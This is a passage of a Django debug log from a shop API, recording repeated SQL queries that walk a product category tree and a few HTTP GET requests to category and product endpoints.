WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 14:01:51,747 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 14:01:51,749 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 14:01:51,752 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 14:01:51,754 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 14:01:51,758 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 14:01:51,760 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 14:01:51,762 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 14:01:51,764 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 14:01:51,766 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 14:01:51,771 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 14:01:51,774 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 14:01:51,777 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 14:01:51,779 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 14:01:51,782 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 14:01:51,785 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 14:01:51,787 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 14:01:51,790 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 14:01:51,792 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 14:01:51,794 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 14:01:51,797 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 14:01:51,799 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 14:01:51,802 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 14:01:51,804 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 14:01:51,807 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 14:01:51,809 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 14:01:51] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 14:03:53,682 utils 4252 140031747061504 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-19 14:03:53,687 utils 4252 140031747061504 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [19/Dec/2019 14:03:53] "GET /api/v1/fire/ HTTP/1.0" 200 482 [19/Dec/2019 14:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 14:05:32,447 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 14:05:32,458 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 14:05:32,464 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 14:05:32,468 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 14:05:32,474 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 14:05:32,478 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 14:05:32,483 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 14:05:32,486 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 14:05:32,490 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 14:05:32,496 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 14:05:32,500 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 14:05:32,504 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 14:05:32,508 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 14:05:32,512 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 14:05:32,517 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 14:05:32,521 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 14:05:32,525 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 14:05:32,529 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 14:05:32,533 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 14:05:32,539 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 14:05:32,543 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 14:05:32,547 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 14:05:32,551 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 14:05:32,554 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 14:05:32,558 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 14:05:32,564 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 14:05:32,568 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 14:05:32,572 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 14:05:32,576 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 14:05:32,580 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 14:05:32,585 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 14:05:32,589 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 14:05:32,593 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 14:05:32,597 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 14:05:32,601 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 14:05:32,608 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 14:05:32,611 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 14:05:32,615 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 14:05:32,619 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 14:05:32,623 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; 